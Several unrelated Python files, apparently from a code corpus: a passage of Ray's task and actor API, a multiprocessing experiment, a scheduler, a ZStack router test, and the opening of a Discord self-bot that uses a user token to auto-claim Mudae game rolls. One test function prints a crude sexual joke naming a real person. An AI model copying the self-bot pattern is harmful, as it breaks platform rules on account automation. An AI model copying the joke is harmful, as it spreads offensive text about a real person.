# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
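# Illustrative sketch (square as sketched earlier is hypothetical): process
# results as they become ready instead of blocking on all of them at once.
#
#     refs = [square.remote(i) for i in range(10)]
#     while refs:
#         ready, refs = ray.wait(refs, num_returns=1)
#         print(ray.get(ready[0]))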
@PublicAPI
@client_mode_hook
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
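# Illustrative sketch (actor class and name are hypothetical): retrieving a
# handle to a named, detached actor from anywhere in the cluster.
#
#     @ray.remote
#     class Counter:
#         def __init__(self):
#             self.n = 0
#         def incr(self):
#             self.n += 1
#             return self.n
#
#     Counter.options(name="global_counter", lifetime="detached").remote()
#     handle = ray.get_actor("global_counter")
#     ray.get(handle.incr.remote())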
@PublicAPI
@client_mode_hook
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
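# Illustrative sketch (Counter as sketched above is hypothetical): force-kill
# versus letting the actor drain its pending tasks.
#
#     handle = Counter.remote()
#     ray.kill(handle)                        # interrupts running tasks
#     # graceful alternative: handle.__ray_terminate__.remote()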
@PublicAPI
@client_mode_hook
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
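# Illustrative sketch (task is hypothetical): cancelling a long-running,
# non-actor task.
#
#     @ray.remote
#     def busy():
#         time.sleep(3600)
#
#     ref = busy.remote()
#     ray.cancel(ref)          # KeyboardInterrupt in the task (force=False)
#     # ray.get(ref) would now raise TaskCancelledError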
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
worker=None,
retry_exceptions=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries, runtime_env)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4, and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
override_environment_variables (Dict[str, str]): (Deprecated in Ray
1.4.0, will be removed in Ray 1.6--please use the ``env_vars``
field of :ref:`runtime-environments` instead.) This specifies
environment variables to override for the actor or task. The
overrides are propagated to all child actors and tasks. This
is a dictionary mapping variable names to their values. Existing
variables can be overridden, new ones can be created, and an
existing variable can be unset by setting it to an empty string.
Note: can only be set via `.options()`.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
"resources", "accelerator_type", "max_calls", "max_restarts",
"max_task_retries", "max_retries", "runtime_env", "retry_exceptions"
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
retry_exceptions = kwargs.get("retry_exceptions")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
worker=worker,
retry_exceptions=retry_exceptions)
|
MultiProcessing.py
|
# Project: hardInfo
# Author: George Keith Watson
# Date Started: March 18, 2022
# Copyright: (c) Copyright 2022 George Keith Watson
# Module: service/MultiProcessing.py
# Date Started: March 22, 2022
# Purpose: Manage initiation and communication between any number of independent processes launched
# in Python.
# Development:
# 2022-03-22: (Experimenting with code examples from: www.tutorialspoint.com/multiprocessing-in-python)
# Each module in this program is an independent tool that can communicate with other tools as needed.
# If another tool is not present in the MultiProcessing registry, its features are simply not
# available in the current tool set. Tools / Python modules can then be installed, configured,
# activated, and deactivated dynamically, allowing easy upgrade from the free, non-commercial
# version of an application to the commercial, paid-for version.
#
from multiprocessing import Process, JoinableQueue, Queue, cpu_count, Event
from tkinter import Tk, messagebox, BOTH
PROGRAM_TITLE = "MultiProcessing"
class ProcessRegistry:
def __init__(self, applicationName: str, **keyWordArguments):
# keyWordArguments includes:
# 'object': An object of a class providing particular methods, including:
# messageReceiver(message: dict)
#
pass
def registerProcess(self, processName: str, attributes: str):
pass
def startProcess(self, processName: str, arguments: dict):
pass
def stopProcess(self, processName: str):
pass
def configureProcess(self, processName: str, configuration: dict):
pass
def activateProcess(self, processName: str, arguments: dict):
pass
def deactivateProcess(self, processName: str, arguments: dict):
pass
def ExitProgram():
answer = messagebox.askyesno('Exit program ', "Exit the " + PROGRAM_TITLE + " program?")
if answer:
# mainView.destroy()
pass
#************************************* Multiple Windowing Processes Test Code *********************************
from os import environ
from view.PropertySheet import PropertySheet
def messageReceiver(message: dict):
print("MultiProcessing.messageReceiver:\t" + str(message))
def theFullMonty(*args):
print("Four score and seven years ago Marilyn Chambers sat on my face", end=" ")
for arg in args:
print(str(arg), end=' ')
from json import loads
from model.Installation import LSHW_JSON_FILE
from view.Components import JsonTreeView
ENV_PROCESS_TITLE = "Current Environment"
HWD_PROCESS_TITLE = "Current Hardware"
def showEnvironment(geoStr):
def exitProcess():
answer = messagebox.askyesno('Exit Process ', "Exit the " + ENV_PROCESS_TITLE + " process?")
if answer:
processView.destroy()
processView = Tk()
processView.protocol('WM_DELETE_WINDOW', exitProcess)
processView.geometry(geoStr)
processView.title(ENV_PROCESS_TITLE)
info = {}
nameIndex = []
for name, value in environ.items():
# print( name + ":\t" + str(value))
info[name] = value
nameIndex.append(name)
nameIndex.sort()
propertySheet = PropertySheet(processView, "Environment Variables", (info, nameIndex), listener=messageReceiver )
propertySheet.pack(expand=True, fill=BOTH)
processView.mainloop()
def showHardware(geoStr):
def exitProcess():
answer = messagebox.askyesno('Exit Process ', "Exit the " + HWD_PROCESS_TITLE + " process?")
if answer:
processView.destroy()
processView = Tk()
processView.protocol('WM_DELETE_WINDOW', exitProcess)
processView.geometry(geoStr)
processView.title(HWD_PROCESS_TITLE)
lshwJsonFile = open(LSHW_JSON_FILE, "r")
jsonText = lshwJsonFile.read()
lshwJsonFile.close()
propertyMap = loads(jsonText)
jsonTreeView = JsonTreeView(processView, propertyMap, {"openBranches": True, "mode": "strict"})
jsonTreeView.pack(expand=True, fill=BOTH)
processView.mainloop()
#************************************* Communicating Multiple Processes Test Code *********************************
import time
class Tool(Process):
def __init__(self, task_queue, result_queue):
Process.__init__(self)
self.task_queue = task_queue
self.result_queue = result_queue
def run(self):
proc_name = self.name
while True:
next_task = self.task_queue.get()
if next_task is None:
# Poison pill means shutdown
print( '%s: Exiting' % proc_name )
self.task_queue.task_done()
break
print( '%s: %s' % (proc_name, next_task))
answer = next_task()
self.task_queue.task_done()
self.result_queue.put(answer)
return
class Task(object):
def __init__(self, a, b):
self.a = a
self.b = b
def __call__(self, *args, **kwargs):
time.sleep(0.1) # Simulated processing time
return '%s * %s = %s' % (self.a, self.b, self.a * self.b)
def __str__(self):
return '%s * %s' % (self.a, self.b)
#********************************* Signaling Between Processes Test Code *********************************
def wait_for_event(event):
"""wait for the event to be set before doing anything"""
print('wait_for_event: starting')
event.wait()
print('wait_for_event: event.is_set()-> ', event.is_set())
def wait_for_event_timeout(event, sec):
"""wait sec seconds and then timeout"""
print('wait_for_event_timeout: starting')
event.wait(sec)
print('wait_for_event_timeout: event.is_set()-->', event.is_set())
if __name__ == '__main__':
# ********************************* Signaling Between Processes Test Code *************************************
event = Event()
workerOne = Process(name='block', target=wait_for_event, args=(event,))
workerOne.start()
workerTwo = Process(name='non-block', target=wait_for_event_timeout, args=(event, 2))
workerTwo.start()
print('main: waiting before calling Event.set()')
time.sleep(3)
event.set()
print('main: event is set')
# ************************************* Communicating Multiple Processes Test Code *********************************
"""
# Establish communication queues
tasks = JoinableQueue()
results = Queue()
# Start Tools:
num_tools = cpu_count() * 2
print('Creating %d Tools' % num_tools)
tools = [ Tool(tasks, results) for i in range(num_tools) ]
for tool in tools:
tool.start()
# Enqueue jobs
num_jobs = 10
for i in range(num_jobs):
tasks.put(Task(i, i))
# Add a poison pill for each Tool
for i in range(num_tools):
tasks.put(None)
# Wait for all of the tasks to finish
tasks.join()
# Start printing results
while num_jobs:
result = results.get()
print( 'Result:\t', result )
num_jobs -= 1
"""
# ********************************* Multiple Windowing Processes Test Code *********************************
"""
georgeKeenan = Process(target=theFullMonty, args=("and wiggled", "rapidly gyrating", "her hips"))
environmentDialog = Process(target=showEnvironment, args=("600x500+100+50",))
hardwareDialog = Process(target=showHardware, args=("600x500+600+50",))
georgeKeenan.start()
environmentDialog.start()
hardwareDialog.start()
idx = 0
while idx < 10:
print(str(idx), end="\t")
idx += 1
georgeKeenan.join()
environmentDialog.join()
hardwareDialog.join()
"""
"""
mainView = Tk()
mainView.protocol('WM_DELETE_WINDOW', ExitProgram)
mainView.geometry("600x500+100+50")
mainView.title(PROGRAM_TITLE)
mainView.mainloop()
"""
|
scheduler.py
|
#!/usr/bin/env python3
from utility import get_time
import threading
from time import sleep
import sys
def run(work_items, slots):
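    """Dispatch work_items onto available slots, each running in its own daemon
    thread; failed work is re-queued up to max_retries, and the list of
    completed work is returned once everything has finished."""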
retries = 0
max_retries = 5000
free_slots = slots
taken_slots = []
work_done = []
total_num_of_jobs = len(work_items)
    while True:
        # Iterate over a copy: slots are removed from taken_slots inside the loop.
        for slot in list(taken_slots):
            if not slot.busy:
                if not slot.work.failed:
work_done.append(slot.work)
print(get_time(),len(work_done),'out of',total_num_of_jobs,'finished.')
elif retries >= max_retries:
break
else:
retries = retries + 1
print(get_time(),'Retrying work...',retries,'of',max_retries,'retries.')
work_items.append(slot.work)
taken_slots.remove(slot)
free_slots.append(slot)
#have we finished all the work?
if len(work_items) == 0:
if len(taken_slots) == 0:
print(get_time(),'All work finished.')
break
elif retries >= max_retries:
print(get_time(),'Max number of failed retries reached!')
sys.exit(1)
else:
if len(free_slots) != 0:
slot = free_slots.pop()
work = work_items.pop()
slot.work = work
print(get_time(),'Encoding',work.get_name(),'on',slot.machine.host)
work_thread = threading.Thread(target=slot.execute, args=(work,))
work_thread.daemon = True
slot.busy = True
work_thread.start()
taken_slots.append(slot)
sleep(0.2)
return work_done
|
test_start_vrs_simultaneously.py
|
'''
Test stopping all VRs, then starting them simultaneously
@author: Youyk
'''
import os
import sys
import threading
import time
import zstacklib.utils.linux as linux
import apibinding.inventory as inventory
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
_config_ = {
'timeout' : 1000,
'noparallel' : True
}
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
exc_info = []
def start_vm(vm_uuid):
try:
vm_ops.start_vm(vm_uuid, session_uuid, 200000)
except:
exc_info.append(sys.exc_info())
def check_status(callback_data):
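    """Return True once the VM identified by callback_data (uuid, state) is reported in that state."""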
vm_uuid, status = callback_data
cond = res_ops.gen_query_conditions('state', '=', status)
cond = res_ops.gen_query_conditions('uuid', '=', vm_uuid, cond)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, cond)
if vms:
return True
return False
def check_exception():
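    """Re-raise the first exception captured by a worker thread, preserving its traceback (Python 2 raise form)."""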
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
raise info1, None, info2
def stop_vm(vm_uuid):
try:
vm_ops.stop_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_1_name = os.environ.get('l3VlanNetworkName1')
l3_2_name = os.environ.get('l3VlanDNATNetworkName')
l3_3_name = os.environ.get('l3VlanNetworkName3')
#l3_4_name = os.environ.get('l3VlanNetworkName5')
l3_1 = test_lib.lib_get_l3_by_name(l3_1_name)
l3_2 = test_lib.lib_get_l3_by_name(l3_2_name)
l3_3 = test_lib.lib_get_l3_by_name(l3_3_name)
#l3_4 = test_lib.lib_get_l3_by_name(l3_4_name)
#create 4 VRs.
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_1_name)
vm.destroy()
vr1 = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)[0]
else:
vr1 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_2_name)
vm.destroy()
vr2 = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)[0]
else:
vr2 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_3_name)
vm.destroy()
vr3 = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)[0]
else:
vr3 = vrs[0]
#vrs = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)
#if not vrs:
# vm = test_stub.create_vlan_vm(l3_name=l3_4_name)
# vm.destroy()
# vr4 = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)[0]
#else:
# vr4 = vrs[0]
vrs = [vr1, vr2, vr3]
#vrs = [vr1, vr2, vr3, vr4]
for vr in vrs:
thread = threading.Thread(target=stop_vm, args=(vr.uuid,))
thread.start()
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
for vr in vrs:
if not linux.wait_callback_success(check_status, (vr.uuid, 'Stopped'), 10):
test_util.test_fail('VM: %s is not stopped, after waiting for extra 10s' % vr.uuid)
check_exception()
for vr in vrs:
thread = threading.Thread(target=start_vm, args=(vr.uuid,))
thread.start()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
test_util.test_pass('Test start VRs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
|
MudaeAutoBot.py
|
import discum
import re
import asyncio
import json
import time
import logging
import threading
from collections import OrderedDict
class CacheDict(OrderedDict):
def __init__(self, *args, **kwds):
self.max = kwds.pop("max", None)
OrderedDict.__init__(self, *args, **kwds)
self._check_size_limit()
def __setitem__(self, key, value):
OrderedDict.__setitem__(self, key, value)
self._check_size_limit()
def _check_size_limit(self):
if self.max is not None:
while len(self) > self.max:
self.popitem(last=False)
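# CacheDict keeps at most `max` entries, evicting the oldest on insert:
#   e.g. a CacheDict(max=2) holding 'a' and 'b' drops 'a' when 'c' is added.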
msg_buf = CacheDict(max=50)
jsonf = open("Settings_Mudae.json")
settings = json.load(jsonf)
jsonf.close()
bot = discum.Client(token=settings["token"],log={"console":False, "file":False})
mudae = 432610292342587392
with open("cmds.txt","r") as f:
mudae_cmds = [line.rstrip() for line in f]
mhids = [int(mh) for mh in settings["channel_ids"]]
channel_settings = dict()
series_list = settings["series_list"]
chars = [charsv.lower() for charsv in settings["namelist"]]
kak_min = settings["min_kak"]
roll_prefix = settings["roll_this"]
sniping = settings.get("sniping_enabled",True)
ready = bot.gateway.READY
mention_finder = re.compile(r'\<@(?:!)?(\d+)\>')
pagination_finder = re.compile(r'\d+ / \d+')
kak_finder = re.compile(r'\*\*??([0-9]+)\*\*<:kakera:469835869059153940>')
like_finder = re.compile(r'Likes\: \#??([0-9]+)')
claim_finder = re.compile(r'Claims\: \#??([0-9]+)')
poke_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min')
wait_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min \w')
waitk_finder = re.compile(r'\*\*(?:([0-9+])h )?([0-9]+)\*\* min')
ser_finder = re.compile(r'.*.')
KakeraVari = [kakerav.lower() for kakerav in settings["emoji_list"]]
eventlist = ["🕯️","😆"]
kakera_wall = {}
waifu_wall = {}
#logging settings
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
def get_kak(text):
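    """Return the kakera value parsed from an embed description, or an estimate
    derived from the Likes/Claims ranks when no explicit value is present."""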
k_value = kak_finder.findall(text)
like_value = like_finder.findall(text)
claim_value=claim_finder.findall(text)
if len(k_value):
return k_value[0]
    elif like_value or claim_value:
        LR = 0
        CR = 0
        CA = 1
        if like_value:
            LR = like_value[0]
        if claim_value:
CR = claim_value[0]
pkak = (int(LR) + int(CR)) /2
multi = 1 + (CA/5500)
return((25000 *(pkak+70)**-.75+20)*multi+.5)
return 0
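# get_wait / get_pwait parse Mudae's "**[Xh ]Y** min" cooldown text into seconds.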
def get_wait(text):
waits = wait_finder.findall(text)
if len(waits):
hours = int(waits[0][0]) if waits[0][0] != '' else 0
return (hours*60+int(waits[0][1]))*60
return 0
def get_pwait(text):
waits = poke_finder.findall(text)
if len(waits):
hours = int(waits[0][0]) if waits[0][0] != '' else 0
return (hours*60+int(waits[0][1]))*60
return 0
def get_serial(text):
serk = ser_finder.findall(text)
return serk[0]
_resp = dict()
def wait_for(bot, predicate, timeout=None):
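    """Block until a gateway message satisfying `predicate` arrives or `timeout`
    elapses, temporarily hooking the gateway; returns the parsed message or None."""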
ev = threading.Event()
ident = threading.get_ident()
def evt_check(resp):
if predicate(resp):
_resp[ident] = resp.parsed.auto()
ev.set()
bot.gateway._after_message_hooks.insert(0,evt_check)
ev.wait(timeout)
bot.gateway.removeCommand(evt_check)
obj = _resp.pop(ident,None)
return obj
def mudae_warning(tide,StartwithUser=True):
# build check func
def c(r):
if r.event.message:
r = r.parsed.auto()
# must be from relevant channel id, and start with username
if StartwithUser == True:
return r['author']['id'] == str(mudae) and r['channel_id'] == tide and r['content'].startswith(f"**{bot.gateway.session.user['username']}")
elif StartwithUser == False:
return r['author']['id'] == str(mudae) and r['channel_id'] == tide
return False
return c
def get_server_settings(guild_id,channel_id):
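    """Return the Mudae $settings text for a channel: from the local cache file
    if present, otherwise by searching message history (caching the result),
    otherwise by reconstructing a default settings block from the roll prefix."""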
try:
with open(f"channeldata\\{channel_id}.txt","r") as textsettings:
print(f"Reading from File for channel {channel_id}")
return textsettings.read()
except IOError:
print(f"File Not Found using Different Method")
msgs = bot.searchMessages(guild_id,authorID=[mudae],textSearch="($togglehentai)",limit = 5)
Rmsgs = bot.filterSearchResults(msgs)
for group in Rmsgs:
if group['content'].startswith("🛠️"):
print(f"Using $settings found during search for channel {channel_id}")
abcdef = group['content'].replace("🛠️","_").replace("⭐","_")
pres_data = open(f"channeldata\\{channel_id}.txt","w+")
pres_data.write(abcdef)
pres_data.close()
return group['content']
# msgs = bot.searchMessages(guild_id,userID=[mudae],textSearch="($togglehentai)").json()['messages']
# for group in msgs:
# for result in group:
# if 'hit' in result:
# if result['content'].startswith("🛠️"):
# print(result)
# return result['content']
# no setting found
# so send settings request, and hope they have default prefix.
FsMsgs = bot.searchMessages(guild_id,channelID=[channel_id],authorID=[bot.gateway.session.user['id']],textSearch=roll_prefix,limit=2)
FsResults = bot.filterSearchResults(FsMsgs)
for group in FsResults:
if group['content'].endswith(roll_prefix):
settings_hope_prefix = group['content'].split(roll_prefix)[0]
print(f"Default $settings used for channel {channel_id}")
default_settings_if_no_settings = f"""🛠️ __**Server Settings**__ 🛠️
(Server not premium)
· Prefix: **{settings_hope_prefix}** ($prefix)
· Lang: **en** ($lang)
· Claim reset: every **180** min. ($setclaim)
· Exact minute of the reset: xx:**56** ($setinterval)
· Reset shifted: by +**0** min. ($shifthour)
· Rolls per hour: **10** ($setrolls)
· Time before the claim reaction expires: **30** sec. ($settimer)
· Spawn rarity multiplicator for already claimed characters: **2** ($setrare)
· Server game mode: **1** ($gamemode)
· This channel instance: **1** ($channelinstance)
· Slash commands: enabled ($toggleslash)
· Ranking: enabled ($toggleclaimrank/$togglelikerank)
· Ranks displayed during rolls: claims and likes ($togglerolls)
· Hentai series: enabled ($togglehentai)
· Disturbing imagery series: enabled ($toggledisturbing)
· Rolls sniping: **2** ($togglesnipe) => **{settings['claim_delay']}** sec.
· Kakera sniping: **1** ($togglekakerasnipe) => **{settings['kak_delay']}** sec.
· Limit of characters per harem: **8100** ($haremlimit)
· Custom reactions: yes ($claimreact list)
· Kakera trading: **disabled** ($togglekakeratrade)
· Kakera calculation: claims and likes ranks (and number of claimed characters) ($togglekakeraclaim/$togglekakeralike)
· Kakera value displayed during rolls: enabled ($togglekakerarolls)
· $kakeraloot wishprotect: enabled ($togglewishprotect)"""
return default_settings_if_no_settings
def parse_settings_message(message):
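    """Parse Mudae's $settings text into a dict (prefix, claim reset interval,
    rolls per hour, reaction expiry, claim/kakera snipe settings, etc.);
    returns None when no message is given."""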
if message == None:
return None
val_parse = re.compile(r'\*\*(\S+)\*\*').findall
num_parse = re.compile(r'(\d+)').findall
settings_p = re.findall(r'\w+: (.*)',message)
settings = dict()
settings['prefix'] = val_parse(settings_p[0])[0]
settings['prefix_len'] = len(settings['prefix'])
settings['claim_reset'] = int(num_parse(settings_p[2])[0]) # in minutes
settings['reset_min'] = int(num_parse(settings_p[3])[0])
settings['shift'] = int(num_parse(settings_p[4])[0])
settings['max_rolls'] = int(num_parse(settings_p[5])[0])
settings['expiry'] = float(num_parse(settings_p[6])[0])
settings['claim_snipe'] = [float(v) for v in num_parse(settings_p[15])]
settings['kak_snipe'] = [float(v) for v in num_parse(settings_p[16])]
# pad out claim/kak snipe for default '0 second cooldown'
if len(settings['claim_snipe']) < 2:
settings['claim_snipe'] += [0.0]
if len(settings['kak_snipe']) < 2:
settings['kak_snipe'] += [0.0]
